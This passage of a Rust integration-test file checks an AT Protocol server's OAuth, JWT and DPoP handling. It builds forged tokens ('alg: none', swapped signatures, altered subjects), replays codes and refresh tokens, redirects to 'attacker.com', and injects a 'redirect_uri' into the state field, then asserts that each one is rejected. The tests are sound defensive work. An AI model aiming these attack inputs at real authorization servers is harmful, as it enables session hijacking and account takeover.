redirect_uri), 78 - ("code_challenge", &code_challenge), 79 - ("code_challenge_method", "S256"), 80 - ]) 81 - .send() 82 - .await 83 - .unwrap() 84 - .json() 85 - .await 86 - .unwrap(); 87 let request_uri = par_body["request_uri"].as_str().unwrap(); 88 let auth_client = no_redirect_client(); 89 - let auth_res = auth_client 90 - .post(format!("{}/oauth/authorize", url)) 91 - .form(&[ 92 - ("request_uri", request_uri), 93 - ("username", &handle), 94 - ("password", password), 95 - ("remember_device", "false"), 96 - ]) 97 - .send() 98 - .await 99 - .unwrap(); 100 - let location = auth_res 101 - .headers() 102 - .get("location") 103 - .unwrap() 104 - .to_str() 105 - .unwrap(); 106 - let code = location 107 - .split("code=") 108 - .nth(1) 109 - .unwrap() 110 - .split('&') 111 - .next() 112 - .unwrap(); 113 - let token_body: Value = http_client 114 - .post(format!("{}/oauth/token", url)) 115 - .form(&[ 116 - ("grant_type", "authorization_code"), 117 - ("code", code), 118 - ("redirect_uri", redirect_uri), 119 - ("code_verifier", &code_verifier), 120 - ("client_id", &client_id), 121 - ]) 122 - .send() 123 - .await 124 - .unwrap() 125 - .json() 126 - .await 127 - .unwrap(); 128 - let access_token = token_body["access_token"].as_str().unwrap().to_string(); 129 - let refresh_token = token_body["refresh_token"].as_str().unwrap().to_string(); 130 - (access_token, refresh_token, client_id) 131 - } 132 - 133 - #[tokio::test] 134 - async fn test_security_forged_token_signature_rejected() { 135 - let url = base_url().await; 136 - let http_client = client(); 137 - let (access_token, _, _) = get_oauth_tokens(&http_client, url).await; 138 - let parts: Vec<&str> = access_token.split('.').collect(); 139 - assert_eq!(parts.len(), 3, "Token should have 3 parts"); 140 - let forged_signature = URL_SAFE_NO_PAD.encode(&[0u8; 32]); 141 - let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_signature); 142 - let res = http_client 143 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 144 - .header("Authorization", format!("Bearer {}", forged_token)) 145 - .send() 146 - .await 147 - .unwrap(); 148 - assert_eq!( 149 - res.status(), 150 - StatusCode::UNAUTHORIZED, 151 - "Forged signature should be rejected" 152 - ); 153 } 154 155 #[tokio::test] 156 - async fn test_security_modified_payload_rejected() { 157 let url = base_url().await; 158 let http_client = client(); 159 let (access_token, _, _) = get_oauth_tokens(&http_client, url).await; 160 let parts: Vec<&str> = access_token.split('.').collect(); 161 let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 162 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 163 payload["sub"] = json!("did:plc:attacker"); 164 let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 165 let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]); 166 - let res = http_client 167 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 168 - .header("Authorization", format!("Bearer {}", modified_token)) 169 - .send() 170 - .await 171 - .unwrap(); 172 - assert_eq!( 173 - res.status(), 174 - StatusCode::UNAUTHORIZED, 175 - "Modified payload should be rejected" 176 - ); 177 } 178 179 #[tokio::test] 180 - async fn test_security_algorithm_none_attack_rejected() { 181 let url = base_url().await; 182 let http_client = client(); 183 - let header = json!({ 184 - "alg": "none", 185 - "typ": "at+jwt" 186 - }); 187 - let payload = json!({ 188 - "iss": "https://test.pds", 189 - "sub": "did:plc:attacker", 190 - "aud": "https://test.pds", 191 - "iat": Utc::now().timestamp(), 192 - "exp": Utc::now().timestamp() + 3600, 193 - "jti": "fake-token-id", 194 - "scope": "atproto" 195 - }); 196 - let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 197 - let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 198 - let malicious_token = format!("{}.{}.", header_b64, payload_b64); 199 - let res = http_client 200 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 201 - .header("Authorization", format!("Bearer {}", malicious_token)) 202 - .send() 203 - .await 204 - .unwrap(); 205 - assert_eq!( 206 - res.status(), 207 - StatusCode::UNAUTHORIZED, 208 - "Algorithm 'none' attack should be rejected" 209 - ); 210 - } 211 - 212 - #[tokio::test] 213 - async fn test_security_algorithm_substitution_attack_rejected() { 214 - let url = base_url().await; 215 - let http_client = client(); 216 - let header = json!({ 217 - "alg": "RS256", 218 - "typ": "at+jwt" 219 - }); 220 - let payload = json!({ 221 - "iss": "https://test.pds", 222 - "sub": "did:plc:attacker", 223 - "aud": "https://test.pds", 224 - "iat": Utc::now().timestamp(), 225 - "exp": Utc::now().timestamp() + 3600, 226 - "jti": "fake-token-id" 227 - }); 228 - let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 229 - let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 230 - let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]); 231 - let malicious_token = format!("{}.{}.{}", header_b64, payload_b64, fake_sig); 232 - let res = http_client 233 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 234 - .header("Authorization", format!("Bearer {}", malicious_token)) 235 - .send() 236 - .await 237 - .unwrap(); 238 - assert_eq!( 239 - res.status(), 240 - StatusCode::UNAUTHORIZED, 241 - "Algorithm substitution attack should be rejected" 242 - ); 243 - } 244 - 245 - #[tokio::test] 246 - async fn test_security_expired_token_rejected() { 247 - let url = base_url().await; 248 - let http_client = client(); 249 - let header = json!({ 250 - "alg": "HS256", 251 - "typ": "at+jwt" 252 - }); 253 - let payload = json!({ 254 - "iss": "https://test.pds", 255 - "sub": "did:plc:test", 256 - "aud": "https://test.pds", 257 - "iat": Utc::now().timestamp() - 7200, 258 - "exp": Utc::now().timestamp() - 3600, 259 - "jti": "expired-token-id" 260 - }); 261 - let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 262 - let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 263 - let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 32]); 264 - let expired_token = format!("{}.{}.{}", header_b64, payload_b64, fake_sig); 265 - let res = http_client 266 - .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 267 - .header("Authorization", format!("Bearer {}", expired_token)) 268 - .send() 269 - .await 270 - .unwrap(); 271 - assert_eq!( 272 - res.status(), 273 - StatusCode::UNAUTHORIZED, 274 - "Expired token should be rejected" 275 - ); 276 - } 277 - 278 - #[tokio::test] 279 - async fn test_security_pkce_plain_method_rejected() { 280 - let url = base_url().await; 281 - let http_client = client(); 282 - let redirect_uri = "https://example.com/pkce-plain-callback"; 283 let mock_client = setup_mock_client_metadata(redirect_uri).await; 284 let client_id = mock_client.uri(); 285 - let res = http_client 286 - .post(format!("{}/oauth/par", url)) 287 - .form(&[ 288 - ("response_type", "code"), 289 - ("client_id", &client_id), 290 - ("redirect_uri", redirect_uri), 291 - ("code_challenge", "plain-text-challenge"), 292 - ("code_challenge_method", "plain"), 293 - ]) 294 - .send() 295 - .await 296 - .unwrap(); 297 - assert_eq!( 298 - res.status(), 299 - StatusCode::BAD_REQUEST, 300 - "PKCE plain method should be rejected" 301 - ); 302 let body: Value = res.json().await.unwrap(); 303 - assert_eq!(body["error"], "invalid_request"); 304 - assert!( 305 - body["error_description"] 306 - .as_str() 307 - .unwrap() 308 - .to_lowercase() 309 - .contains("s256"), 310 - "Error should mention S256 requirement" 311 - ); 312 - } 313 - 314 - #[tokio::test] 315 - async fn test_security_pkce_missing_challenge_rejected() { 316 - let url = base_url().await; 317 - let http_client = client(); 318 - let redirect_uri = "https://example.com/no-pkce-callback"; 319 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 320 - let client_id = mock_client.uri(); 321 - let res = http_client 322 - .post(format!("{}/oauth/par", url)) 323 - .form(&[ 324 - ("response_type", "code"), 325 - ("client_id", &client_id), 326 - ("redirect_uri", redirect_uri), 327 - ]) 328 - .send() 329 - .await 330 - .unwrap(); 331 - assert_eq!( 332 - res.status(), 333 - StatusCode::BAD_REQUEST, 334 - "Missing PKCE challenge should be rejected" 335 - ); 336 - } 337 - 338 - #[tokio::test] 339 - async fn test_security_pkce_wrong_verifier_rejected() { 340 - let url = base_url().await; 341 - let http_client = client(); 342 let ts = Utc::now().timestamp_millis(); 343 let handle = format!("pkce-attack-{}", ts); 344 - let email = format!("pkce-attack-{}@example.com", ts); 345 - let password = "pkce-attack-password"; 346 - http_client 347 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 348 - .json(&json!({ 349 - "handle": handle, 350 - "email": email, 351 - "password": password 352 - })) 353 - .send() 354 - .await 355 - .unwrap(); 356 - let redirect_uri = "https://example.com/pkce-attack-callback"; 357 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 358 - let client_id = mock_client.uri(); 359 let (_, code_challenge) = generate_pkce(); 360 let (attacker_verifier, _) = generate_pkce(); 361 - let par_body: Value = http_client 362 - .post(format!("{}/oauth/par", url)) 363 - .form(&[ 364 - ("response_type", "code"), 365 - ("client_id", &client_id), 366 - ("redirect_uri", redirect_uri), 367 - ("code_challenge", &code_challenge), 368 - ("code_challenge_method", "S256"), 369 - ]) 370 - .send() 371 - .await 372 - .unwrap() 373 - .json() 374 - .await 375 - .unwrap(); 376 let request_uri = par_body["request_uri"].as_str().unwrap(); 377 let auth_client = no_redirect_client(); 378 - let auth_res = auth_client 379 - .post(format!("{}/oauth/authorize", url)) 380 - .form(&[ 381 - ("request_uri", request_uri), 382 - ("username", &handle), 383 - ("password", password), 384 - ("remember_device", "false"), 385 - ]) 386 - .send() 387 - .await 388 - .unwrap(); 389 - let location = auth_res 390 - .headers() 391 - .get("location") 392 - .unwrap() 393 - .to_str() 394 - .unwrap(); 395 - let code = location 396 - .split("code=") 397 - .nth(1) 398 - .unwrap() 399 - .split('&') 400 - .next() 401 - .unwrap(); 402 - let token_res = http_client 403 - .post(format!("{}/oauth/token", url)) 404 - .form(&[ 405 - ("grant_type", "authorization_code"), 406 - ("code", code), 407 - ("redirect_uri", redirect_uri), 408 - ("code_verifier", &attacker_verifier), 409 - ("client_id", &client_id), 410 - ]) 411 - .send() 412 - .await 413 - .unwrap(); 414 - assert_eq!( 415 - token_res.status(), 416 - StatusCode::BAD_REQUEST, 417 - "Wrong PKCE verifier should be rejected" 418 - ); 419 - let body: Value = token_res.json().await.unwrap(); 420 - assert_eq!(body["error"], "invalid_grant"); 421 } 422 423 #[tokio::test] 424 - async fn test_security_authorization_code_replay_attack() { 425 let url = base_url().await; 426 let http_client = client(); 427 let ts = Utc::now().timestamp_millis(); 428 - let handle = format!("code-replay-{}", ts); 429 - let email = format!("code-replay-{}@example.com", ts); 430 - let password = "code-replay-password"; 431 - http_client 432 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 433 - .json(&json!({ 434 - "handle": handle, 435 - "email": email, 436 - "password": password 437 - })) 438 - .send() 439 - .await 440 - .unwrap(); 441 - let redirect_uri = "https://example.com/code-replay-callback"; 442 let mock_client = setup_mock_client_metadata(redirect_uri).await; 443 let client_id = mock_client.uri(); 444 let (code_verifier, code_challenge) = generate_pkce(); 445 - let par_body: Value = http_client 446 - .post(format!("{}/oauth/par", url)) 447 - .form(&[ 448 - ("response_type", "code"), 449 - ("client_id", &client_id), 450 - ("redirect_uri", redirect_uri), 451 - ("code_challenge", &code_challenge), 452 - ("code_challenge_method", "S256"), 453 - ]) 454 - .send() 455 - .await 456 - .unwrap() 457 - .json() 458 - .await 459 - .unwrap(); 460 let request_uri = par_body["request_uri"].as_str().unwrap(); 461 let auth_client = no_redirect_client(); 462 - let auth_res = auth_client 463 - .post(format!("{}/oauth/authorize", url)) 464 - .form(&[ 465 - ("request_uri", request_uri), 466 - ("username", &handle), 467 - ("password", password), 468 - ("remember_device", "false"), 469 - ]) 470 - .send() 471 - .await 472 - .unwrap(); 473 - let location = auth_res 474 - .headers() 475 - .get("location") 476 - .unwrap() 477 - .to_str() 478 - .unwrap(); 479 - let code = location 480 - .split("code=") 481 - .nth(1) 482 - .unwrap() 483 - .split('&') 484 - .next() 485 - .unwrap(); 486 - let stolen_code = code.to_string(); 487 - let first_res = http_client 488 - .post(format!("{}/oauth/token", url)) 489 - .form(&[ 490 - ("grant_type", "authorization_code"), 491 - ("code", code), 492 - ("redirect_uri", redirect_uri), 493 - ("code_verifier", &code_verifier), 494 - ("client_id", &client_id), 495 - ]) 496 - .send() 497 - .await 498 - .unwrap(); 499 - assert_eq!( 500 - first_res.status(), 501 - StatusCode::OK, 502 - "First use should succeed" 503 - ); 504 - let replay_res = http_client 505 - .post(format!("{}/oauth/token", url)) 506 - .form(&[ 507 - ("grant_type", "authorization_code"), 508 - ("code", &stolen_code), 509 - ("redirect_uri", redirect_uri), 510 - ("code_verifier", &code_verifier), 511 - ("client_id", &client_id), 512 - ]) 513 - .send() 514 - .await 515 - .unwrap(); 516 - assert_eq!( 517 - replay_res.status(), 518 - StatusCode::BAD_REQUEST, 519 - "Replay attack should fail" 520 - ); 521 - let body: Value = replay_res.json().await.unwrap(); 522 - assert_eq!(body["error"], "invalid_grant"); 523 } 524 525 #[tokio::test] 526 - async fn test_security_refresh_token_replay_attack() { 527 - let url = base_url().await; 528 - let http_client = client(); 529 - let ts = Utc::now().timestamp_millis(); 530 - let handle = format!("rt-replay-{}", ts); 531 - let email = format!("rt-replay-{}@example.com", ts); 532 - let password = "rt-replay-password"; 533 - http_client 534 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 535 - .json(&json!({ 536 - "handle": handle, 537 - "email": email, 538 - "password": password 539 - })) 540 - .send() 541 - .await 542 - .unwrap(); 543 - let redirect_uri = "https://example.com/rt-replay-callback"; 544 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 545 - let client_id = mock_client.uri(); 546 - let (code_verifier, code_challenge) = generate_pkce(); 547 - let par_body: Value = http_client 548 - .post(format!("{}/oauth/par", url)) 549 - .form(&[ 550 - ("response_type", "code"), 551 - ("client_id", &client_id), 552 - ("redirect_uri", redirect_uri), 553 - ("code_challenge", &code_challenge), 554 - ("code_challenge_method", "S256"), 555 - ]) 556 - .send() 557 - .await 558 - .unwrap() 559 - .json() 560 - .await 561 - .unwrap(); 562 - let request_uri = par_body["request_uri"].as_str().unwrap(); 563 - let auth_client = no_redirect_client(); 564 - let auth_res = auth_client 565 - .post(format!("{}/oauth/authorize", url)) 566 - .form(&[ 567 - ("request_uri", request_uri), 568 - ("username", &handle), 569 - ("password", password), 570 - ("remember_device", "false"), 571 - ]) 572 - .send() 573 - .await 574 - .unwrap(); 575 - let location = auth_res 576 - .headers() 577 - .get("location") 578 - .unwrap() 579 - .to_str() 580 - .unwrap(); 581 - let code = location 582 - .split("code=") 583 - .nth(1) 584 - .unwrap() 585 - .split('&') 586 - .next() 587 - .unwrap(); 588 - let token_body: Value = http_client 589 - .post(format!("{}/oauth/token", url)) 590 - .form(&[ 591 - ("grant_type", "authorization_code"), 592 - ("code", code), 593 - ("redirect_uri", redirect_uri), 594 - ("code_verifier", &code_verifier), 595 - ("client_id", &client_id), 596 - ]) 597 - .send() 598 - .await 599 - .unwrap() 600 - .json() 601 - .await 602 - .unwrap(); 603 - let stolen_refresh_token = token_body["refresh_token"].as_str().unwrap().to_string(); 604 - let first_refresh: Value = http_client 605 - .post(format!("{}/oauth/token", url)) 606 - .form(&[ 607 - ("grant_type", "refresh_token"), 608 - ("refresh_token", &stolen_refresh_token), 609 - ("client_id", &client_id), 610 - ]) 611 - .send() 612 - .await 613 - .unwrap() 614 - .json() 615 - .await 616 - .unwrap(); 617 - assert!( 618 - first_refresh["access_token"].is_string(), 619 - "First refresh should succeed" 620 - ); 621 - let new_refresh_token = first_refresh["refresh_token"].as_str().unwrap(); 622 - let replay_res = http_client 623 - .post(format!("{}/oauth/token", url)) 624 - .form(&[ 625 - ("grant_type", "refresh_token"), 626 - ("refresh_token", &stolen_refresh_token), 627 - ("client_id", &client_id), 628 - ]) 629 - .send() 630 - .await 631 - .unwrap(); 632 - assert_eq!( 633 - replay_res.status(), 634 - StatusCode::BAD_REQUEST, 635 - "Refresh token replay should fail" 636 - ); 637 - let body: Value = replay_res.json().await.unwrap(); 638 - assert_eq!(body["error"], "invalid_grant"); 639 - assert!( 640 - body["error_description"] 641 - .as_str() 642 - .unwrap() 643 - .to_lowercase() 644 - .contains("reuse"), 645 - "Error should mention token reuse" 646 - ); 647 - let family_revoked_res = http_client 648 - .post(format!("{}/oauth/token", url)) 649 - .form(&[ 650 - ("grant_type", "refresh_token"), 651 - ("refresh_token", new_refresh_token), 652 - ("client_id", &client_id), 653 - ]) 654 - .send() 655 - .await 656 - .unwrap(); 657 - assert_eq!( 658 - family_revoked_res.status(), 659 - StatusCode::BAD_REQUEST, 660 - "Token family should be revoked after replay detection" 661 - ); 662 - } 663 - 664 - #[tokio::test] 665 - async fn test_security_redirect_uri_manipulation() { 666 let url = base_url().await; 667 let http_client = client(); 668 let registered_redirect = "https://legitimate-app.com/callback"; 669 - let attacker_redirect = "https://attacker.com/steal"; 670 let mock_client = setup_mock_client_metadata(registered_redirect).await; 671 let client_id = mock_client.uri(); 672 let (_, code_challenge) = generate_pkce(); 673 - let res = http_client 674 - .post(format!("{}/oauth/par", url)) 675 - .form(&[ 676 - ("response_type", "code"), 677 - ("client_id", &client_id), 678 - ("redirect_uri", attacker_redirect), 679 - ("code_challenge", &code_challenge), 680 - ("code_challenge_method", "S256"), 681 - ]) 682 - .send() 683 - .await 684 - .unwrap(); 685 - assert_eq!( 686 - res.status(), 687 - StatusCode::BAD_REQUEST, 688 - "Unregistered redirect_uri should be rejected" 689 - ); 690 - } 691 - 692 - #[tokio::test] 693 - async fn test_security_deactivated_account_blocked() { 694 - let url = base_url().await; 695 - let http_client = client(); 696 let ts = Utc::now().timestamp_millis(); 697 - let handle = format!("deact-sec-{}", ts); 698 - let email = format!("deact-sec-{}@example.com", ts); 699 - let password = "deact-sec-password"; 700 - let create_res = http_client 701 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 702 - .json(&json!({ 703 - "handle": handle, 704 - "email": email, 705 - "password": password 706 - })) 707 - .send() 708 - .await 709 - .unwrap(); 710 - assert_eq!(create_res.status(), StatusCode::OK); 711 let account: Value = create_res.json().await.unwrap(); 712 - let did = account["did"].as_str().unwrap(); 713 - let access_jwt = verify_new_account(&http_client, did).await; 714 - let deact_res = http_client 715 - .post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url)) 716 - .header("Authorization", format!("Bearer {}", access_jwt)) 717 - .json(&json!({})) 718 - .send() 719 - .await 720 - .unwrap(); 721 - assert_eq!(deact_res.status(), StatusCode::OK); 722 - let redirect_uri = "https://example.com/deact-sec-callback"; 723 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 724 - let client_id = mock_client.uri(); 725 - let (_, code_challenge) = generate_pkce(); 726 - let par_body: Value = http_client 727 - .post(format!("{}/oauth/par", url)) 728 - .form(&[ 729 - ("response_type", "code"), 730 - ("client_id", &client_id), 731 - ("redirect_uri", redirect_uri), 732 - ("code_challenge", &code_challenge), 733 - ("code_challenge_method", "S256"), 734 - ]) 735 - .send() 736 - .await 737 - .unwrap() 738 - .json() 739 - .await 740 - .unwrap(); 741 - let request_uri = par_body["request_uri"].as_str().unwrap(); 742 - let auth_res = http_client 743 - .post(format!("{}/oauth/authorize", url)) 744 .header("Accept", "application/json") 745 - .form(&[ 746 - ("request_uri", request_uri), 747 - ("username", &handle), 748 - ("password", password), 749 - ("remember_device", "false"), 750 - ]) 751 - .send() 752 - .await 753 - .unwrap(); 754 - assert_eq!( 755 - auth_res.status(), 756 - StatusCode::FORBIDDEN, 757 - "Deactivated account should be blocked from OAuth" 758 - ); 759 - let body: Value = auth_res.json().await.unwrap(); 760 - assert_eq!(body["error"], "access_denied"); 761 } 762 763 #[tokio::test] 764 - async fn test_security_url_injection_in_state_parameter() { 765 let url = base_url().await; 766 let http_client = client(); 767 - let ts = Utc::now().timestamp_millis(); 768 - let handle = format!("inject-state-{}", ts); 769 - let email = format!("inject-state-{}@example.com", ts); 770 - let password = "inject-state-password"; 771 - http_client 772 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 773 - .json(&json!({ 774 - "handle": handle, 775 - "email": email, 776 - "password": password 777 - })) 778 - .send() 779 - .await 780 - .unwrap(); 781 - let redirect_uri = "https://example.com/inject-callback"; 782 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 783 - let client_id = mock_client.uri(); 784 - let (code_verifier, code_challenge) = generate_pkce(); 785 - let malicious_state = "state&redirect_uri=https://attacker.com&extra="; 786 - let par_body: Value = http_client 787 - .post(format!("{}/oauth/par", url)) 788 - .form(&[ 789 - ("response_type", "code"), 790 - ("client_id", &client_id), 791 - ("redirect_uri", redirect_uri), 792 - ("code_challenge", &code_challenge), 793 - ("code_challenge_method", "S256"), 794 - ("state", malicious_state), 795 - ]) 796 - .send() 797 - .await 798 - .unwrap() 799 - .json() 800 - .await 801 - .unwrap(); 802 - let request_uri = par_body["request_uri"].as_str().unwrap(); 803 - let auth_client = no_redirect_client(); 804 - let auth_res = auth_client 805 - .post(format!("{}/oauth/authorize", url)) 806 - .form(&[ 807 - ("request_uri", request_uri), 808 - ("username", &handle), 809 - ("password", password), 810 - ("remember_device", "false"), 811 - ]) 812 - .send() 813 - .await 814 - .unwrap(); 815 - assert!( 816 - auth_res.status().is_redirection(), 817 - "Should redirect successfully" 818 - ); 819 - let location = auth_res 820 - .headers() 821 - .get("location") 822 - .unwrap() 823 - .to_str() 824 - .unwrap(); 825 - assert!( 826 - location.starts_with(redirect_uri), 827 - "Redirect should go to registered URI, not attacker URI. Got: {}", 828 - location 829 - ); 830 - let redirect_uri_count = location.matches("redirect_uri=").count(); 831 - assert!( 832 - redirect_uri_count <= 1, 833 - "State injection should not add extra redirect_uri parameters" 834 - ); 835 - assert!( 836 - location.contains(&urlencoding::encode(malicious_state).to_string()) 837 - || location.contains("state=state%26redirect_uri"), 838 - "State parameter should be properly URL-encoded. Got: {}", 839 - location 840 - ); 841 } 842 843 #[tokio::test] 844 - async fn test_security_cross_client_token_theft() { 845 let url = base_url().await; 846 let http_client = client(); 847 - let ts = Utc::now().timestamp_millis(); 848 - let handle = format!("cross-client-{}", ts); 849 - let email = format!("cross-client-{}@example.com", ts); 850 - let password = "cross-client-password"; 851 - http_client 852 - .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 853 - .json(&json!({ 854 - "handle": handle, 855 - "email": email, 856 - "password": password 857 - })) 858 - .send() 859 - .await 860 - .unwrap(); 861 - let redirect_uri_a = "https://app-a.com/callback"; 862 - let mock_client_a = setup_mock_client_metadata(redirect_uri_a).await; 863 - let client_id_a = mock_client_a.uri(); 864 - let redirect_uri_b = "https://app-b.com/callback"; 865 - let mock_client_b = setup_mock_client_metadata(redirect_uri_b).await; 866 - let client_id_b = mock_client_b.uri(); 867 - let (code_verifier, code_challenge) = generate_pkce(); 868 - let par_body: Value = http_client 869 - .post(format!("{}/oauth/par", url)) 870 - .form(&[ 871 - ("response_type", "code"), 872 - ("client_id", &client_id_a), 873 - ("redirect_uri", redirect_uri_a), 874 - ("code_challenge", &code_challenge), 875 - ("code_challenge_method", "S256"), 876 - ]) 877 - .send() 878 - .await 879 - .unwrap() 880 - .json() 881 - .await 882 - .unwrap(); 883 - let request_uri = par_body["request_uri"].as_str().unwrap(); 884 - let auth_client = no_redirect_client(); 885 - let auth_res = auth_client 886 - .post(format!("{}/oauth/authorize", url)) 887 - .form(&[ 888 - ("request_uri", request_uri), 889 - ("username", &handle), 890 - ("password", password), 891 - ("remember_device", "false"), 892 - ]) 893 - .send() 894 - .await 895 - .unwrap(); 896 - let location = auth_res 897 - .headers() 898 - .get("location") 899 - .unwrap() 900 - .to_str() 901 - .unwrap(); 902 - let code = location 903 - .split("code=") 904 - .nth(1) 905 - .unwrap() 906 - .split('&') 907 - .next() 908 - .unwrap(); 909 - let token_res = http_client 910 - .post(format!("{}/oauth/token", url)) 911 - .form(&[ 912 - ("grant_type", "authorization_code"), 913 - ("code", code), 914 - ("redirect_uri", redirect_uri_a), 915 - ("code_verifier", &code_verifier), 916 - ("client_id", &client_id_b), 917 - ]) 918 - .send() 919 - .await 920 - .unwrap(); 921 - assert_eq!( 922 - token_res.status(), 923 - StatusCode::BAD_REQUEST, 924 - "Cross-client code exchange must be explicitly rejected (defense-in-depth)" 925 - ); 926 - let body: Value = token_res.json().await.unwrap(); 927 - assert_eq!(body["error"], "invalid_grant"); 928 - assert!( 929 - body["error_description"] 930 - .as_str() 931 - .unwrap() 932 - .contains("client_id"), 933 - "Error should mention client_id mismatch" 934 - ); 935 } 936 937 - #[test] 938 - fn test_security_dpop_nonce_tamper_detection() { 939 - let secret = b"test-dpop-secret-32-bytes-long!!"; 940 - let verifier = DPoPVerifier::new(secret); 941 - let nonce = verifier.generate_nonce(); 942 - let nonce_bytes = URL_SAFE_NO_PAD.decode(&nonce).unwrap(); 943 - let mut tampered = nonce_bytes.clone(); 944 - if !tampered.is_empty() { 945 - tampered[0] ^= 0xFF; 946 - } 947 - let tampered_nonce = URL_SAFE_NO_PAD.encode(&tampered); 948 - let result = verifier.validate_nonce(&tampered_nonce); 949 - assert!(result.is_err(), "Tampered nonce should be rejected"); 950 - } 951 - 952 - #[test] 953 - fn test_security_dpop_nonce_cross_server_rejected() { 954 - let secret1 = b"server-1-secret-32-bytes-long!!!"; 955 - let secret2 = b"server-2-secret-32-bytes-long!!!"; 956 - let verifier1 = DPoPVerifier::new(secret1); 957 - let verifier2 = DPoPVerifier::new(secret2); 958 - let nonce_from_server1 = verifier1.generate_nonce(); 959 - let result = verifier2.validate_nonce(&nonce_from_server1); 960 - assert!( 961 - result.is_err(), 962 - "Nonce from different server should be rejected" 963 - ); 964 - } 965 - 966 - #[test] 967 - fn test_security_dpop_proof_signature_tampering() { 968 use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 969 use p256::elliptic_curve::sec1::ToEncodedPoint; 970 - let secret = b"test-dpop-secret-32-bytes-long!!"; 971 - let verifier = DPoPVerifier::new(secret); 972 let signing_key = SigningKey::random(&mut rand::thread_rng()); 973 - let verifying_key = signing_key.verifying_key(); 974 - let point = verifying_key.to_encoded_point(false); 975 let x = URL_SAFE_NO_PAD.encode(point.x().unwrap()); 976 let y = URL_SAFE_NO_PAD.encode(point.y().unwrap()); 977 - let header = json!({ 978 - "typ": "dpop+jwt", 979 - "alg": "ES256", 980 - "jwk": { 981 - "kty": "EC", 982 - "crv": "P-256", 983 - "x": x, 984 - "y": y 985 - } 986 - }); 987 - let payload = json!({ 988 - "jti": format!("tamper-test-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)), 989 - "htm": "POST", 990 - "htu": "https://example.com/token", 991 - "iat": Utc::now().timestamp() 992 - }); 993 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 994 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 995 let signing_input = format!("{}.{}", header_b64, payload_b64); 996 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 997 - let mut sig_bytes = signature.to_bytes().to_vec(); 998 - sig_bytes[0] ^= 0xFF; 999 - let tampered_sig = URL_SAFE_NO_PAD.encode(&sig_bytes); 1000 - let tampered_proof = format!("{}.{}.{}", header_b64, payload_b64, tampered_sig); 1001 - let result = verifier.verify_proof(&tampered_proof, "POST", "https://example.com/token", None); 1002 - assert!( 1003 - result.is_err(), 1004 - "Tampered DPoP signature should be rejected" 1005 - ); 1006 } 1007 1008 #[test] 1009 - fn test_security_dpop_proof_key_substitution() { 1010 use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 1011 use p256::elliptic_curve::sec1::ToEncodedPoint; 1012 let secret = b"test-dpop-secret-32-bytes-long!!"; 1013 let verifier = DPoPVerifier::new(secret); 1014 let signing_key = SigningKey::random(&mut rand::thread_rng()); 1015 let attacker_key = SigningKey::random(&mut rand::thread_rng()); 1016 - let attacker_verifying = attacker_key.verifying_key(); 1017 - let attacker_point = attacker_verifying.to_encoded_point(false); 1018 let x = URL_SAFE_NO_PAD.encode(attacker_point.x().unwrap()); 1019 let y = URL_SAFE_NO_PAD.encode(attacker_point.y().unwrap()); 1020 - let header = json!({ 1021 - "typ": "dpop+jwt", 1022 - "alg": "ES256", 1023 - "jwk": { 1024 - "kty": "EC", 1025 - "crv": "P-256", 1026 - "x": x, 1027 - "y": y 1028 - } 1029 - }); 1030 - let payload = json!({ 1031 - "jti": format!("key-sub-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)), 1032 - "htm": "POST", 1033 - "htu": "https://example.com/token", 1034 - "iat": Utc::now().timestamp() 1035 - }); 1036 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 1037 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 1038 let signing_input = format!("{}.{}", header_b64, payload_b64); 1039 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 1040 - let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 1041 - let mismatched_proof = format!("{}.{}.{}", header_b64, payload_b64, signature_b64); 1042 - let result = 1043 - verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None); 1044 - assert!( 1045 - result.is_err(), 1046 - "DPoP proof with mismatched key should be rejected" 1047 - ); 1048 } 1049 1050 #[test] 1051 - fn test_security_jwk_thumbprint_consistency() { 1052 - let jwk = DPoPJwk { 1053 - kty: "EC".to_string(), 1054 - crv: Some("P-256".to_string()), 1055 x: Some("WbbXrPhtCg66wuF0NLhzXxF5PFzNZ7wNJm9M_1pCcXY".to_string()), 1056 